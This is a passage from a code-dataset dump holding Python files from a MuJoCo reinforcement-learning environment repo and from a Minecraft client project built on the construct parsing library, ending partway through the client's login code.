'cnn_fc':\n params['network_class'] = 'baselines.her.cnn_actor_critic:CNNActorCritic'\n\n if vv['env_name'] in config.DEFAULT_ENV_PARAMS:\n params.update(config.DEFAULT_ENV_PARAMS[vv['env_name']]) # merge env-specific parameters in\n params.update(**override_params) # makes it possible to override any parameter\n with open(os.path.join(logger.get_dir(), 'variant.json'), 'w') as f:\n json.dump(params, f)\n params = config.prepare_params(params)\n config.log_params(params, logger=logger)\n\n shapes = config.configure_shapes(params)\n dims = shapes_to_dims(shapes)\n policy = config.configure_ddpg(dims=dims, shapes=shapes, params=params, clip_return=vv['clip_return'])\n\n rollout_params = {\n 'exploit': False,\n 'use_target_net': False,\n 'use_demo_states': True,\n 'compute_Q': False,\n 'T': params['T'],\n }\n\n eval_params = {\n 'exploit': True,\n 'use_target_net': params['test_with_polyak'],\n 'use_demo_states': False,\n 'compute_Q': True,\n 'T': params['T'],\n }\n\n for name in ['T', 'rollout_batch_size', 'gamma', 'noise_eps', 'random_eps']:\n rollout_params[name] = params[name]\n eval_params[name] = params[name]\n\n rollout_worker = RolloutWorker(params['make_env'], policy, dims, logger, **rollout_params)\n rollout_worker.seed(rank_seed)\n\n evaluator = RolloutWorker(params['make_env'], policy, dims, logger, **eval_params)\n evaluator.seed(rank_seed)\n\n train(\n logdir=logdir, policy=policy, rollout_worker=rollout_worker,\n evaluator=evaluator, n_epochs=vv['n_epochs'], n_test_rollouts=params['n_test_rollouts'],\n n_cycles=params['n_cycles'], n_batches=params['n_batches'],\n policy_save_interval=vv['policy_save_interval'], save_policies=vv['save_policies'])\n\n# @click.option('--logdir', type=str, default='/media/xingyu/ExtraDrive1/data_vHER/',\n# help='the path to where logs and policy pickles should go. If not specified, creates a folder in /tmp/')\n# @click.option('--exp_name', type=str, default='push')\n"
},
{
"alpha_fraction": 0.5726169943809509,
"alphanum_fraction": 0.5887348055839539,
"avg_line_length": 32.35838317871094,
"blob_id": "8b23d6094e094fe69f29c4d39f5f8839ac90ac9f",
"content_id": "4eb76418d36633d73a9f1f049ccb59b6a9c979a7",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5770,
"license_type": "permissive",
"max_line_length": 145,
"num_lines": 173,
"path": "/baselines_hrl/envs/square2d/square2d_nongoal.py",
"repo_name": "harjatinsingh/mujoco-env",
"src_encoding": "UTF-8",
"text": "# Created by Xingyu Lin, 10/06/2018 \nfrom mujoco_py import load_model_from_path, MjSim, MjViewer\n# from gym import spaces\nfrom rllab import spaces\nfrom gym import Env, GoalEnv\nfrom gym.utils import seeding\nimport os\nimport numpy as np\nfrom os import path\n\n\nclass Square2dEnv(Env):\n # TODO make this into GoalEnv\n def __init__(self, model_path='./square2d.xml', distance_threshold=1e-1, frame_skip=2, goal=[0.3, 0.3],\n horizon=100):\n\n if model_path.startswith(\"/\"):\n fullpath = model_path\n else:\n fullpath = os.path.join(os.path.dirname(__file__), model_path)\n if not path.exists(fullpath):\n raise IOError(\"File %s does not exist\" % fullpath)\n\n self.model = load_model_from_path(fullpath)\n self.seed()\n self.sim = MjSim(self.model)\n self.data = self.sim.data\n self.viewer = None\n self.distance_threshold = distance_threshold\n self.frame_skip = frame_skip\n self.set_goal_location(goal)\n self.reward_type = 'dense'\n self.horizon = horizon\n self.time_step = 0\n obs = self.get_current_observation()\n self.action_space = spaces.Box(-1., 1., shape=(2,))\n self.observation_space = spaces.Box(-np.inf, np.inf, shape=obs.shape)\n\n def seed(self, seed=None):\n self.np_random, seed = seeding.np_random(seed)\n return [seed]\n\n def reset(self):\n self.set_ball_location([0., 0.])\n self.sim.forward()\n self.time_step = 0\n return self.get_current_observation()\n\n def _get_viewer(self):\n if self.viewer is None:\n self.viewer = MjViewer(self.sim)\n self.viewer_setup()\n return self.viewer\n\n def viewer_setup(self):\n\n self.viewer.cam.lookat[0] = 0.0 # x,y,z offset from the object (works if trackbodyid=-1)\n self.viewer.cam.lookat[1] = 0.0\n self.viewer.cam.lookat[2] = 0.0\n self.viewer.cam.elevation = -90 # camera rotation around the axis in the plane going through the frame origin (if 0 you just see a line)\n self.viewer.cam.azimuth = 90\n self.viewer.cam.distance = 1.5\n\n def set_goal_location(self, goalPos):\n # goal = [xLoc, yLoc]\n assert np.linalg.norm(np.asarray(goalPos) - np.asarray([0.3, 0.3]), axis=-1) < 0.1\n self.sim.data.qpos[0] = goalPos[0]\n self.sim.data.qpos[1] = goalPos[1]\n\n def set_ball_location(self, ballPos):\n\n self.sim.data.qpos[2] = ballPos[0]\n self.sim.data.qpos[3] = ballPos[1]\n\n def set_distance_threshold(self, distance_threshold):\n self.distance_threshold = distance_threshold\n\n def set_frame_skip(self, frame_skip):\n self.frame_skip = frame_skip\n\n def get_frame_skip(self):\n return self.frame_skip\n\n def get_distance_threshold(self):\n return self.distance_threshold\n\n def get_ball_location(self):\n return self.sim.data.qpos[2:4]\n\n def get_goal_location(self):\n return self.sim.data.qpos[0:2]\n\n def get_ball_velocity(self):\n return self.sim.data.qvel[2:4]\n\n def send_control_command(self, xDirectionControl, yDirectionControl):\n\n self.sim.data.ctrl[0] = xDirectionControl\n self.sim.data.ctrl[1] = yDirectionControl\n\n def get_current_observation(self):\n obs = np.concatenate([self.get_goal_location(), self.get_ball_location(), self.get_ball_velocity()]).ravel()\n return obs.copy()\n # obs = np.concatenate([self.get_ball_location(), self.get_ball_velocity()]).ravel()\n # desired_goal = self.get_goal_location()\n # achieved_goal = self.get_ball_location()\n # return {\n # 'observation': obs.copy(),\n # 'achieved_goal': achieved_goal.copy(),\n # 'desired_goal': desired_goal.copy()\n #\n # }\n\n def get_image_of_goal_observation(self, xLoc=None, yLoc=None):\n\n if not xLoc:\n xLoc = self.sim.data.qpos[0]\n\n if not yLoc:\n yLoc = self.sim.data.qpos[1]\n\n self.sim.data.qpos[0] = xLoc\n self.sim.data.qpos[1] = yLoc\n self.sim.data.qpos[2] = xLoc\n self.sim.data.qpos[3] = yLoc\n\n self.render()\n\n def do_simulation(self, ctrl, n_frames):\n self.send_control_command(ctrl[0], ctrl[1])\n for _ in range(n_frames):\n self.take_step()\n\n def step(self, ctrl):\n\n if np.linalg.norm(self.get_goal_location() - [0.3, 0.3], axis=-1) > 0.1:\n print(self.get_goal_location())\n # assert False\n ctrl = np.clip(ctrl, -1., 1.)\n self.do_simulation(ctrl, self.frame_skip)\n obs = self.get_current_observation()\n info = {\n }\n reward = self.compute_reward(self.get_ball_location(), self.get_goal_location(), {})\n done = (reward == 1.0)\n self.time_step += 1\n if self.time_step >= self.horizon:\n done = True\n return obs, reward, done, info\n\n def take_step(self):\n self.sim.step()\n\n def render(self, mode='human'):\n self._get_viewer().render()\n\n def compute_reward(self, achieved_goal, desired_goal, info):\n # Compute distance between goal and the achieved goal.\n d = np.linalg.norm(achieved_goal - desired_goal, axis=-1)\n if self.reward_type == 'sparse':\n return -(d > self.distance_threshold).astype(np.float32)\n else:\n return -d\n\n def _is_success(self, achieved_goal, desired_goal):\n d = np.linalg.norm(achieved_goal - desired_goal, axis=-1)\n return (d < self.distance_threshold).astype(np.float32)\n\n def log_diagnostics(self, paths):\n pass\n\n def terminate(self):\n pass"
},
{
"alpha_fraction": 0.5966782569885254,
"alphanum_fraction": 0.6171826720237732,
"avg_line_length": 29.672956466674805,
"blob_id": "fdf3502571b5c1743238768a2ccf442ea0095daf",
"content_id": "bd60f95da653c2cfbaf589067977027d9e4278f2",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4877,
"license_type": "permissive",
"max_line_length": 113,
"num_lines": 159,
"path": "/baselines_hrl/envs/__init__.py",
"repo_name": "harjatinsingh/mujoco-env",
"src_encoding": "UTF-8",
"text": "# Created by Xingyu Lin, 18/03/2018 \nfrom gym.envs.registration import register\n\n# square2d registration\nregister(\n id='Square2d-v0',\n entry_point='envs.square2d:Square2dEnv',\n max_episode_steps=1000\n)\n\nregister(\n id='Square2dVisual-v0',\n entry_point='envs.square2d:Square2dVisualEnv',\n max_episode_steps=1000\n)\n\n\nregister(\n id='Square2dSimple-v0',\n entry_point='envs.square2d:Square2dSimpleEnv',\n max_episode_steps=1000\n )\n\n\nregister(\n id='Square2dVisualSimple-v0',\n entry_point='envs.square2d:Square2dVisualSimpleEnv',\n max_episode_steps=1000\n )\n# Reference: Visual Gym registration\n# ---------------------------\n\ndef _merge(a, b):\n a.update(b)\n return a\n\n\nfor reward_type in ['sparse', 'dense']:\n suffix = 'Dense' if reward_type == 'dense' else ''\n kwargs = {\n 'reward_type': reward_type,\n }\n\n # Fetch\n register(\n id='VisualFetchSlide{}-v0'.format(suffix),\n entry_point='envs.gym_robotics_visual:FetchSlideEnv',\n kwargs=kwargs,\n max_episode_steps=50,\n )\n\n register(\n id='VisualFetchPickAndPlace{}-v0'.format(suffix),\n entry_point='envs.gym_robotics_visual:FetchPickAndPlaceEnv',\n kwargs=kwargs,\n max_episode_steps=50,\n )\n\n register(\n id='VisualFetchReach{}-v0'.format(suffix),\n entry_point='envs.gym_robotics_visual:FetchReachEnv',\n kwargs=kwargs,\n max_episode_steps=50,\n )\n\n register(\n id='VisualFetchPush{}-v0'.format(suffix),\n entry_point='envs.gym_robotics_visual:FetchPushEnv',\n kwargs=kwargs,\n max_episode_steps=50,\n )\n\n # Hand\n register(\n id='VisualHandReach{}-v0'.format(suffix),\n entry_point='envs.gym_robotics_visual:HandReachEnv',\n kwargs=kwargs,\n max_episode_steps=50,\n )\n\n register(\n id='VisualHandManipulateBlockRotateZ{}-v0'.format(suffix),\n entry_point='envs.gym_robotics_visual:HandBlockEnv',\n kwargs=_merge({'target_position': 'ignore', 'target_rotation': 'z'}, kwargs),\n max_episode_steps=100,\n )\n\n register(\n id='VisualHandManipulateBlockRotateParallel{}-v0'.format(suffix),\n entry_point='envs.gym_robotics_visual:HandBlockEnv',\n kwargs=_merge({'target_position': 'ignore', 'target_rotation': 'parallel'}, kwargs),\n max_episode_steps=100,\n )\n\n register(\n id='VisualHandManipulateBlockRotateXYZ{}-v0'.format(suffix),\n entry_point='envs.gym_robotics_visual:HandBlockEnv',\n kwargs=_merge({'target_position': 'ignore', 'target_rotation': 'xyz'}, kwargs),\n max_episode_steps=100,\n )\n\n register(\n id='VisualHandManipulateBlockFull{}-v0'.format(suffix),\n entry_point='envs.gym_robotics_visual:HandBlockEnv',\n kwargs=_merge({'target_position': 'random', 'target_rotation': 'xyz'}, kwargs),\n max_episode_steps=100,\n )\n\n # Alias for \"Full\"\n register(\n id='VisualHandManipulateBlock{}-v0'.format(suffix),\n entry_point='envs.gym_robotics_visual:HandBlockEnv',\n kwargs=_merge({'target_position': 'random', 'target_rotation': 'xyz'}, kwargs),\n max_episode_steps=100,\n )\n\n register(\n id='VisualHandManipulateEggRotate{}-v0'.format(suffix),\n entry_point='envs.gym_robotics_visual:HandEggEnv',\n kwargs=_merge({'target_position': 'ignore', 'target_rotation': 'xyz'}, kwargs),\n max_episode_steps=100,\n )\n\n register(\n id='VisualHandManipulateEggFull{}-v0'.format(suffix),\n entry_point='envs.gym_robotics_visual:HandEggEnv',\n kwargs=_merge({'target_position': 'random', 'target_rotation': 'xyz'}, kwargs),\n max_episode_steps=100,\n )\n\n # Alias for \"Full\"\n register(\n id='VisualHandManipulateEgg{}-v0'.format(suffix),\n entry_point='envs.gym_robotics_visual:HandEggEnv',\n kwargs=_merge({'target_position': 'random', 'target_rotation': 'xyz'}, kwargs),\n max_episode_steps=100,\n )\n\n register(\n id='VisualHandManipulatePenRotate{}-v0'.format(suffix),\n entry_point='envs.gym_robotics_visual:HandPenEnv',\n kwargs=_merge({'target_position': 'ignore', 'target_rotation': 'xyz'}, kwargs),\n max_episode_steps=100,\n )\n\n register(\n id='VisualHandManipulatePenFull{}-v0'.format(suffix),\n entry_point='envs.gym_robotics_visual:HandPenEnv',\n kwargs=_merge({'target_position': 'random', 'target_rotation': 'xyz'}, kwargs),\n max_episode_steps=100,\n )\n\n # Alias for \"Full\"\n register(\n id='VisualHandManipulatePen{}-v0'.format(suffix),\n entry_point='envs.gym_robotics_visual:HandPenEnv',\n kwargs=_merge({'target_position': 'random', 'target_rotation': 'xyz'}, kwargs),\n max_episode_steps=100,\n )\n"
},
{
"alpha_fraction": 0.5377697944641113,
"alphanum_fraction": 0.5755395889282227,
"avg_line_length": 24.31818199157715,
"blob_id": "2593607e96660221afd13d6c706654c46a3d4b1c",
"content_id": "42beea2907041b37c17cb435f206e17b5346229e",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 556,
"license_type": "permissive",
"max_line_length": 51,
"num_lines": 22,
"path": "/baselines_hrl/test/square2d_test.py",
"repo_name": "harjatinsingh/mujoco-env",
"src_encoding": "UTF-8",
"text": "# Created by Xingyu Lin, 03/06/2018\nimport gym\nimport envs\nimport scipy.misc\n\nfrom envs.square2d import Square2dEnv\nimport time\nimport numpy as np\nif __name__ == '__main__':\n test_env = 'Square2dSimple-v0'\n # env = gym.make(test_env)\n env = Square2dEnv(horizon=1000)\n for i in range(5):\n env.reset()\n done = False\n time_count = 0\n while not done:\n time_count += 1\n action = env.action_space.sample()\n obs, reward, done, _ = env.step(action)\n env.render()\n time.sleep(3)"
},
{
"alpha_fraction": 0.5879999995231628,
"alphanum_fraction": 0.6039999723434448,
"avg_line_length": 30.93617057800293,
"blob_id": "35363675a4f1a9b8def33a71beca182bd87cb2b4",
"content_id": "b10fa350c1eb5419c110bc3fe06c2d527a88e9c6",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1500,
"license_type": "permissive",
"max_line_length": 86,
"num_lines": 47,
"path": "/baselines_hrl/envs/square2d/square2d_visual_simple_env.py",
"repo_name": "harjatinsingh/mujoco-env",
"src_encoding": "UTF-8",
"text": "from mujoco_py import load_model_from_path, MjSim, MjViewer\nfrom gym import spaces\nfrom gym import Env, GoalEnv\nfrom gym.utils import seeding\nimport os\nimport numpy as np\nfrom numpy.random import random\nfrom os import path\nfrom envs.square2d.square2d_visual_env import Square2dVisualEnv\n\n\nclass Square2dVisualSimpleEnv(Square2dVisualEnv):\n def __init__(self, *args, **kwargs):\n super(Square2dVisualSimpleEnv, self).__init__(*args, **kwargs)\n if 'horizon' not in kwargs:\n self.horizon = 100\n\n ''' \n def reset(self):\n self.set_ball_location([0., 0.])\n self.set_goal_location(self._sample_goal())\n self.sim.forward()\n self.time_step = 0\n return self.get_current_observation()\n '''\n def step(self, ctrl):\n ctrl = np.clip(ctrl, -1., 1.)\n ctrl = ctrl/100\n ballPos = self.get_ball_location()\n self.set_ball_location(np.asarray(ballPos) + np.asarray(ctrl))\n self.sim.forward()\n self.take_step()\n obs = self.get_current_observation()\n info = {\n 'is_success': self._is_success(obs['achieved_goal'], obs['desired_goal']),\n }\n reward = self.compute_reward(obs['achieved_goal'], obs['desired_goal'], {})\n done = (reward == 1.0)\n self.time_step += 1\n if self.time_step >= self.horizon:\n done = True\n return obs, reward, done, info\n\n\n @staticmethod\n def _sample_goal():\n return (random((2,)) - 0.5)/3"
}
] | 15 |
cbroughton/Crafti | https://github.com/cbroughton/Crafti | 905c448cd8fc2c19f1187c177e2815ed8be2f8f7 | 6d9781234161ea1ebb39c57622a4f9275109e59f | 1f5e47c837063da1c513b518d49a6d9867ec3d3b | refs/heads/master | 2020-05-17T00:31:56.272552 | 2011-01-13T03:59:43 | 2011-01-13T03:59:43 | 1,234,677 | 1 | 1 | null | null | null | null | null | [
{
"alpha_fraction": 0.6744186282157898,
"alphanum_fraction": 0.7325581312179565,
"avg_line_length": 20.5,
"blob_id": "cab854dff91ce8d39c8a760ded3c949f8a4750c0",
"content_id": "85ab4ffa998adbfcff2359e2e740bf95e2f8204f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 86,
"license_type": "no_license",
"max_line_length": 45,
"num_lines": 4,
"path": "/construct/formats/filesystem/ntfs5.py",
"repo_name": "cbroughton/Crafti",
"src_encoding": "UTF-8",
"text": "\"\"\"\nNT File System (NTFS) version 5\nUsed for MSWindows systems since Windows 2000\n\"\"\"\n"
},
{
"alpha_fraction": 0.7200000286102295,
"alphanum_fraction": 0.7333333492279053,
"avg_line_length": 24,
"blob_id": "8b6ccb0b51eb8874eb079fcb5c14cbd865794a53",
"content_id": "4a7db467a6c96c12a137f22556dfc6d13f33eb65",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 75,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 3,
"path": "/construct/protocols/layer3/icmpv6.py",
"repo_name": "cbroughton/Crafti",
"src_encoding": "UTF-8",
"text": "\"\"\"\nInternet Control Message Protocol for IPv6 (TCP/IP protocol stack)\n\"\"\"\n"
},
{
"alpha_fraction": 0.6363636255264282,
"alphanum_fraction": 0.6363636255264282,
"avg_line_length": 10,
"blob_id": "0f0d20b3ebb7684cf62d87927eed426a931a9813",
"content_id": "48c2d48d49d712ac0659f47625dd95cbfc24006e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 33,
"license_type": "no_license",
"max_line_length": 24,
"num_lines": 3,
"path": "/construct/formats/document/doc.py",
"repo_name": "cbroughton/Crafti",
"src_encoding": "UTF-8",
"text": "\"\"\"\nMicrosoft Word Document \n\"\"\"\n"
},
{
"alpha_fraction": 0.7307692170143127,
"alphanum_fraction": 0.7435897588729858,
"avg_line_length": 25,
"blob_id": "b70276290f3dfc28375267814e4089fa1e3fdd30",
"content_id": "888b72e0bff3f5b76ecde2188f2b64579db65974",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 78,
"license_type": "no_license",
"max_line_length": 69,
"num_lines": 3,
"path": "/construct/protocols/layer4/sctp.py",
"repo_name": "cbroughton/Crafti",
"src_encoding": "UTF-8",
"text": "\"\"\"\nStream Control Transmission Protocol (SS7 and TCP/IP protocol stacks)\n\"\"\"\n"
},
{
"alpha_fraction": 0.8055555820465088,
"alphanum_fraction": 0.8055555820465088,
"avg_line_length": 44.85714340209961,
"blob_id": "d1994cbbdc544600dc9e68c5df8bfd9537f22695",
"content_id": "322e111a83ef629acb499f72a8604529b3140672",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 324,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 7,
"path": "/construct/lib/__init__.py",
"repo_name": "cbroughton/Crafti",
"src_encoding": "UTF-8",
"text": "from binary import int_to_bin, bin_to_int, swap_bytes, encode_bin, decode_bin\nfrom bitstream import BitStreamReader, BitStreamWriter\nfrom container import (Container, AttrDict, FlagsContainer, \n ListContainer, LazyContainer)\nfrom hex import HexString, hexdump\nfrom utils import Packer, StringIO\nfrom path import drill\n\n\n\n"
},
{
"alpha_fraction": 0.7313432693481445,
"alphanum_fraction": 0.7313432693481445,
"avg_line_length": 21.33333396911621,
"blob_id": "b3d3d42693d41b9124b897189e262c9cd82a922a",
"content_id": "1df058af6a9a9f7c3e6f75d82c433c8e797669cf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 67,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 3,
"path": "/construct/protocols/application/snmp.py",
"repo_name": "cbroughton/Crafti",
"src_encoding": "UTF-8",
"text": "\"\"\"\nSimple Network Management Protocol (TCP/IP protocol stack)\n\"\"\"\n"
},
{
"alpha_fraction": 0.4781649708747864,
"alphanum_fraction": 0.5747684240341187,
"avg_line_length": 25.081396102905273,
"blob_id": "6d99867a63df9ad6252a11704bf1c2931d6eb8c6",
"content_id": "a1edcdf95e935076617a11f449e7ac68ccc9476a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2267,
"license_type": "no_license",
"max_line_length": 77,
"num_lines": 86,
"path": "/construct/formats/graphics/wmf.py",
"repo_name": "cbroughton/Crafti",
"src_encoding": "UTF-8",
"text": "\"\"\"\nWindows Meta File\n\"\"\"\nfrom construct import *\n\n\nwmf_record = Struct(\"records\",\n ULInt32(\"size\"), # size in words, including the size, function and params\n Enum(ULInt16(\"function\"),\n Arc = 0x0817,\n Chord = 0x0830,\n Ellipse = 0x0418,\n ExcludeClipRect = 0x0415,\n FloodFill = 0x0419,\n IntersectClipRect = 0x0416,\n LineTo = 0x0213,\n MoveTo = 0x0214,\n OffsetClipRgn = 0x0220,\n OffsetViewportOrg = 0x0211,\n OffsetWindowOrg = 0x020F,\n PatBlt = 0x061D,\n Pie = 0x081A,\n RealizePalette = 0x0035,\n Rectangle = 0x041B,\n ResizePalette = 0x0139,\n RestoreDC = 0x0127,\n RoundRect = 0x061C,\n SaveDC = 0x001E,\n ScaleViewportExt = 0x0412,\n ScaleWindowExt = 0x0400,\n SetBkColor = 0x0201,\n SetBkMode = 0x0102,\n SetMapMode = 0x0103,\n SetMapperFlags = 0x0231,\n SetPixel = 0x041F,\n SetPolyFillMode = 0x0106,\n SetROP2 = 0x0104,\n SetStretchBltMode = 0x0107,\n SetTextAlign = 0x012E,\n SetTextCharacterExtra = 0x0108,\n SetTextColor = 0x0209,\n SetTextJustification = 0x020A,\n SetViewportExt = 0x020E,\n SetViewportOrg = 0x020D,\n SetWindowExt = 0x020C,\n SetWindowOrg = 0x020B,\n _default_ = Pass,\n ),\n Array(lambda ctx: ctx.size - 3, ULInt16(\"params\")),\n)\n\nwmf_placeable_header = Struct(\"placeable_header\",\n Const(ULInt32(\"key\"), 0x9AC6CDD7),\n ULInt16(\"handle\"),\n SLInt16(\"left\"),\n SLInt16(\"top\"),\n SLInt16(\"right\"),\n SLInt16(\"bottom\"),\n ULInt16(\"units_per_inch\"),\n Padding(4),\n ULInt16(\"checksum\")\n)\n\nwmf_file = Struct(\"wmf_file\",\n # --- optional placeable header ---\n Optional(wmf_placeable_header),\n \n # --- header ---\n Enum(ULInt16(\"type\"),\n InMemory = 0,\n File = 1,\n ),\n Const(ULInt16(\"header_size\"), 9),\n ULInt16(\"version\"),\n ULInt32(\"size\"), # file size is in words\n ULInt16(\"number_of_objects\"),\n ULInt32(\"size_of_largest_record\"),\n ULInt16(\"number_of_params\"),\n \n # --- records ---\n GreedyRange(wmf_record)\n)\n\nif __name__ == \"__main__\":\n obj = wmf_file.parse_stream(open(\"../../test/wmf1.wmf\", \"rb\"))\n print obj\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.2684377431869507,
"alphanum_fraction": 0.34099921584129333,
"avg_line_length": 18.238462448120117,
"blob_id": "eb7e8a33ddcc9b46b9ab53e4046746c88e162c65",
"content_id": "4f41ea5684ab86fd61d7996c87240bddddb49bed",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2522,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 130,
"path": "/construct/lib/path.py",
"repo_name": "cbroughton/Crafti",
"src_encoding": "UTF-8",
"text": "from container import Container\n\n\ndef drill(obj, root = \"\", levels = -1):\n if levels == 0:\n yield root, obj\n return\n levels -= 1\n if isinstance(obj, Container):\n for k, v in obj:\n r = \"%s.%s\" % (root, k)\n if levels:\n for r2, v2 in drill(v, r, levels):\n yield r2, v2\n else:\n yield r, v\n elif isinstance(obj, list):\n for i, item in enumerate(obj):\n r = \"%s[%d]\" % (root, i)\n if levels:\n for r2, v2 in drill(item, r, levels):\n yield r2, v2\n else:\n yield r, item\n else:\n yield root, obj\n\n\nif __name__ == \"__main__\":\n from construct import *\n \n c = Struct(\"foo\",\n Byte(\"a\"),\n Struct(\"b\",\n Byte(\"c\"),\n UBInt16(\"d\"),\n ),\n Byte(\"e\"),\n Array(4,\n Struct(\"f\", \n Byte(\"x\"),\n Byte(\"y\"),\n ),\n ),\n Byte(\"g\"),\n )\n o = c.parse(\"acddexyxyxyxyg\")\n \n for lvl in range(4):\n for path, value in drill(o, levels = lvl):\n print path, value\n print \"---\"\n \n output = \"\"\" \n Container:\n a = 97\n b = Container:\n c = 99\n d = 25700\n e = 101\n f = [\n Container:\n x = 120\n y = 121\n Container:\n x = 120\n y = 121\n Container:\n x = 120\n y = 121\n Container:\n x = 120\n y = 121\n ]\n g = 103\n ---\n .a 97\n .b Container:\n c = 99\n d = 25700\n .e 101\n .f [\n Container:\n x = 120\n y = 121\n Container:\n x = 120\n y = 121\n Container:\n x = 120\n y = 121\n Container:\n x = 120\n y = 121\n ]\n .g 103\n ---\n .a 97\n .b.c 99\n .b.d 25700\n .e 101\n .f[0] Container:\n x = 120\n y = 121\n .f[1] Container:\n x = 120\n y = 121\n .f[2] Container:\n x = 120\n y = 121\n .f[3] Container:\n x = 120\n y = 121\n .g 103\n ---\n .a 97\n .b.c 99\n .b.d 25700\n .e 101\n .f[0].x 120\n .f[0].y 121\n .f[1].x 120\n .f[1].y 121\n .f[2].x 120\n .f[2].y 121\n .f[3].x 120\n .f[3].y 121\n .g 103\n ---\n \"\"\"\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.695652186870575,
"alphanum_fraction": 0.72826087474823,
"avg_line_length": 22,
"blob_id": "6870f563308ea69564303a11d15a9ad80b1805ed",
"content_id": "8c5d370ab78decf9d091240d67c931a2029185b5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 92,
"license_type": "no_license",
"max_line_length": 64,
"num_lines": 4,
"path": "/construct/formats/filesystem/ext3.py",
"repo_name": "cbroughton/Crafti",
"src_encoding": "UTF-8",
"text": "\"\"\"\nExtension 3 (ext3)\nUsed primarily for concurrent Linux systems (ext2 + journalling)\n\"\"\"\n"
},
{
"alpha_fraction": 0.6190476417541504,
"alphanum_fraction": 0.6190476417541504,
"avg_line_length": 13,
"blob_id": "ae31b4eb8228211c3dce324e72f03bc12ba84976",
"content_id": "74c006ec7134cab692dfec33ab2a27f5d1a13d89",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 42,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 3,
"path": "/construct/protocols/application/xwindows.py",
"repo_name": "cbroughton/Crafti",
"src_encoding": "UTF-8",
"text": "\"\"\"\nX-Windows (TCP/IP protocol stack)\n\"\"\"\n"
},
{
"alpha_fraction": 0.6428571343421936,
"alphanum_fraction": 0.6428571343421936,
"avg_line_length": 8.333333015441895,
"blob_id": "b99a8abf3b253bff29c00ca55d7b63e7829e91ee",
"content_id": "7d0bffffe761f8c6190b566e025777353c6688f2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 28,
"license_type": "no_license",
"max_line_length": 19,
"num_lines": 3,
"path": "/construct/formats/document/postscript.py",
"repo_name": "cbroughton/Crafti",
"src_encoding": "UTF-8",
"text": "\"\"\"\nPostscript document\n\"\"\"\n"
},
{
"alpha_fraction": 0.5079245567321777,
"alphanum_fraction": 0.5192452669143677,
"avg_line_length": 34.890953063964844,
"blob_id": "2cc9da3e354023ae4599cee6cf97c2909532bf24",
"content_id": "aa169df3927ac0088cd5ec64b5c0778caa031d57",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 15900,
"license_type": "no_license",
"max_line_length": 193,
"num_lines": 431,
"path": "/SMP.py",
"repo_name": "cbroughton/Crafti",
"src_encoding": "UTF-8",
"text": "# -*- coding: cp1252 -*-\r\nfrom twisted.internet.protocol import Protocol\r\nfrom twisted.internet.protocol import ClientFactory\r\nfrom twisted.internet import reactor\r\nfrom twisted.internet import task\r\nfrom twisted.internet import tksupport\r\n\r\nfrom numpy import zeros\r\nfrom numpy import uint8\r\n\r\nfrom Tkinter import *\r\n\r\n#import os\r\n#import sys\r\n#sys.path.append(os.path.abspath(os.path.dirname(sys.executable)))\r\n\r\n# Bravo Libraries (~dab755a0b118b5125e4b)\r\nfrom packets import make_packet\r\nfrom packets import parse_packets\r\n\r\nimport mechanize\r\n\r\ntry:\r\n conf = open(\"crafti.config\").read().splitlines()\r\n username = conf[0].strip() # Username that owns Minecraft Alpha\r\n password = conf[1].strip() # Password for the above account\r\n version = conf[2].strip() # Version reported to minecraft.net\r\n\r\n automatic = conf[3].strip() # Connect, execute rules, leave.\r\n silent = conf[4].strip() # Never speak, unless \"SAY\" used.\r\n\r\n server = conf[5].strip() # Server (IP:PORT) last connected...\r\n print (\"INFO: crafti.config loaded!\")\r\nexcept:\r\n print (\"WARN: crafti.config not loaded!\")\r\n print (\"INFO: Prompting for settings...\")\r\n username = raw_input(\"\\tMinecraft Username: \").strip()\r\n password = raw_input(\"\\tMinecraft Password: \").strip()\r\n version = \"12\"\r\n automatic = \"no\"\r\n silent = \"no\"\r\n server = \"\"\r\nfinally:\r\n print (\"\\nConfiguration for Run:\")\r\n print (\"\\tUsername: %s\"%username)\r\n print (\"\\tPassword: %s\"%password)\r\n print (\"\\tVersion: %s\"%version)\r\n print (\"\\tAutomated: %s\"%automatic)\r\n print (\"\\tSilent: %s\"%silent)\r\n#End of try, catch, finally\r\n\r\nprint (\"\\n\\nINFO: Attempting to login to minecraft.net ...\")\r\nlogin = mechanize.Browser()\r\nloginResult = login.open(\"http://www.minecraft.net/game/getversion.jsp?user=%s&password=%s&version=%s\"%(username,password,version)).read()\r\n\r\n# Get the values from the response, hopefully.\r\nprint (\"DEBUG: Parsing loginResult...\")\r\ntry:\r\n loggedIn = False\r\n if \"Bad\" in loginResult:\r\n print (\"CRIT: minecraft.net says: %s. Please try again.\"%loginResult)\r\n elif \"Error\" in loginResult:\r\n print (\"CRIT: 